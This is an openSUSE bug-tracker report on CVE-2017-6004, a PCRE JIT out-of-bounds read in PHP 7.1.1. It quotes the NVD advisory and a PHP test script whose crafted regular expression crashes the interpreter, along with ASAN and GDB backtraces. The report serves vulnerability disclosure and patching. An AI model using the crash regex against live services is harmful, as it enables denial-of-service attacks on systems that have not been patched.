Bug ID 1025709
Summary VUL-0: CVE-2017-6004: php7: Segmentation fault in PHP7.1.1(bundled PCRE8.38)
Classification openSUSE
Product openSUSE Distribution
Version Leap 42.2
Hardware Other
OS Other
Status NEW
Severity Normal
Priority P5 - None
Component Security
Assignee security-team@suse.de
Reporter mikhail.kasimov@gmail.com
QA Contact qa-bugs@suse.de
Found By ---
Blocker ---

Ref: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6004
====================================================================
 Original release date: 02/16/2017
Last revised: 02/16/2017
Source: US-CERT/NIST
Awaiting Analysis

This vulnerability is currently awaiting analysis.
Overview

The compile_bracket_matchingpath function in pcre_jit_compile.c in PCRE through
8.x before revision 1680 (e.g., the PHP 7.1.1 bundled version) allows remote
attackers to cause a denial of service (out-of-bounds read and application
crash) via a crafted regular expression.
References to Advisories, Solutions, and Tools

By selecting these links, you will be leaving NIST webspace. We have provided
these links to other web sites because they may have information that would be
of interest to you. No inferences should be drawn on account of other sites
being referenced, or not, from this page. There may be other web sites that are
more appropriate for your purpose. NIST does not necessarily endorse the views
expressed, or concur with the facts presented on these sites. Further, NIST
does not endorse any commercial products that may be mentioned on these sites.
Please address comments about this page to nvd@nist.gov.


External Source: CONFIRM
Name:
https://vcs.pcre.org/pcre/code/trunk/pcre_jit_compile.c?r1=1676&r2=1680&view=patch
Hyperlink:
https://vcs.pcre.org/pcre/code/trunk/pcre_jit_compile.c?r1=1676&r2=1680&view=patch
External Source: CONFIRM
Name: https://bugs.exim.org/show_bug.cgi?id=2035
Hyperlink: https://bugs.exim.org/show_bug.cgi?id=2035

====================================================================

>From https://bugs.exim.org/show_bug.cgi?id=2035
====================================================================
Segmentation fault in php_src/ext/pcre/pcrelib/pcre_jit_compile.c:7336.

$ php -r "echo PCRE_VERSION;"
8.38 2015-11-23
$ php -v
PHP 7.1.1 (cli) (built: Feb 12 2017 15:35:23) ( NTS )
Copyright (c) 1997-2017 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2017 Zend Technologies


Test script:
---------------
<?php
$pattern = "/(((?(?!))0(?1))(?''))/";
preg_match($pattern, "helloworld");
?>


Actual result:
--------------
ASAN Result:
==106214==ERROR: AddressSanitizer: SEGV on unknown address 0x60b000017fe0 (pc
0x000000750be8 bp 0x7ffe5a0aeb60 sp 0x7ffe5a0adf00 T0)
==106214==The signal is caused by a READ memory access.
   #0 0x750be7 in compile_bracket_matchingpath (/tmp/php+0x750be7)
   #1 0x70cf95 in compile_matchingpath (/tmp/php+0x70cf95)
   #2 0x750fe3 in compile_bracket_matchingpath (/tmp/php+0x750fe3)
   #3 0x70cf95 in compile_matchingpath (/tmp/php+0x70cf95)
   #4 0x711ebd in compile_recurse (/tmp/php+0x711ebd)
   #5 0x6fbe01 in _pcre_jit_compile (/tmp/php+0x6fbe01)
   #6 0x6e99ed in php_pcre_study (/tmp/php+0x6e99ed)
   #7 0x77b1ce in pcre_get_compiled_regex_cache (/tmp/php+0x77b1ce)
   #8 0x79aa23 in php_do_pcre_match (/tmp/php+0x79aa23)
   #9 0x78a61e in zif_preg_match (/tmp/php+0x78a61e)
   #10 0x1a52c81 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER
(/tmp/php+0x1a52c81)
   #11 0x17c8be3 in execute_ex (/tmp/php+0x17c8be3)
   #12 0x17cae8a in zend_execute (/tmp/php+0x17cae8a)
   #13 0x15c0a84 in zend_execute_scripts (/tmp/php+0x15c0a84)
   #14 0x1351285 in php_execute_script (/tmp/php+0x1351285)
   #15 0x1c94879 in do_cli (/tmp/php+0x1c94879)
   #16 0x1c91ca0 in main (/tmp/php+0x1c91ca0)
   #17 0x7f98bd6d082f in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
   #18 0x43a768 in _start (/tmp/php+0x43a768)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (/tmp/php+0x750be7) in
compile_bracket_matchingpath


GDB backtrace:
#0  0x0000000000661138 in compile_bracket_matchingpath (common=0x7fffffffa5e8,
cc=0x1f04d4f "x", parent=0x7fffffffa870) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:7336
#1  0x000000000062aa23 in compile_matchingpath (common=0x7fffffffa5e8,
cc=<optimized out>, ccend=0x1f04d57 "x", parent=0x7fffffffa870) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:8497
#2  0x0000000000609e7c in compile_recurse (common=<optimized out>) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:9719
#3  _pcre_jit_compile (re=0x1f04d00, extra=0x1f04d70, mode=0) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_jit_compile.c:10223
#4  0x00000000005e97d5 in php_pcre_study (external_re=0x1f04d00, options=1,
errorptr=<optimized out>) at
/home/idaifish/Workspace/PHP/PHPs/php-7.1.1/ext/pcre/pcrelib/pcre_study.c:1628
#5  0x00000000006ac7e9 in pcre_get_compiled_regex_cache (regex=0x7ffff3c71120)
at ext/pcre/php_pcre.c:518
#6  0x00000000006bf5dc in php_pcre_replace (regex=0x1f1b541, subject=<optimized
out>, subject_len=<optimized out>, replace_val=<optimized out>,
is_callable_replace=<optimized out>, limit=<optimized out>,
replace_count=<optimized out>, subject_str=<optimized out>) at
ext/pcre/php_pcre.c:1132
#7  php_replace_in_subject (regex=0x7ffff3c13230, replace=0x7ffff3c13240,
subject=<optimized out>, limit=-1, is_callable_replace=0,
replace_count=0x7fffffffabf4) at ext/pcre/php_pcre.c:1495
#8  0x00000000006be0ff in preg_replace_impl (return_value=0x7fffffffac78,
regex=0x7ffff3c13230, replace=0x7ffff3c13240, subject=0x7ffff3c13250,
limit_val=-1, is_callable_replace=0, is_filter=<optimized out>) at
ext/pcre/php_pcre.c:1554
#9  0x00000000006bb5ef in zif_preg_filter (execute_data=0x7ffff3c131e0,
return_value=0x7fffffffac78) at ext/pcre/php_pcre.c:1721
#10 0x00000000015ba4b5 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER
(execute_data=0x7ffff3c13030) at Zend/zend_vm_execute.h:628
#11 0x00000000014a7510 in execute_ex (ex=<optimized out>) at
Zend/zend_vm_execute.h:432
#12 0x00000000014a812b in zend_execute (op_array=0x7ffff3c7d000,
return_value=<optimized out>) at Zend/zend_vm_execute.h:474
#13 0x0000000001371f21 in zend_execute_scripts (type=<optimized out>,
retval=0x0, file_count=3) at Zend/zend.c:1474
#14 0x00000000011a84dc in php_execute_script (primary_file=0x7fffffffe218) at
main/main.c:2537
#15 0x00000000016a555d in do_cli (argc=<optimized out>, argv=<optimized out>)
at sapi/cli/php_cli.c:993
#16 0x00000000016a1dd9 in main (argc=<optimized out>, argv=<optimized out>) at
sapi/cli/php_cli.c:1381
====================================================================

https://software.opensuse.org/package/php7

TW: 7.0.15 (official repo)
42.2: 7.0.7 (official repo)

devel:languages:php repo: 7.1.1


You are receiving this mail because: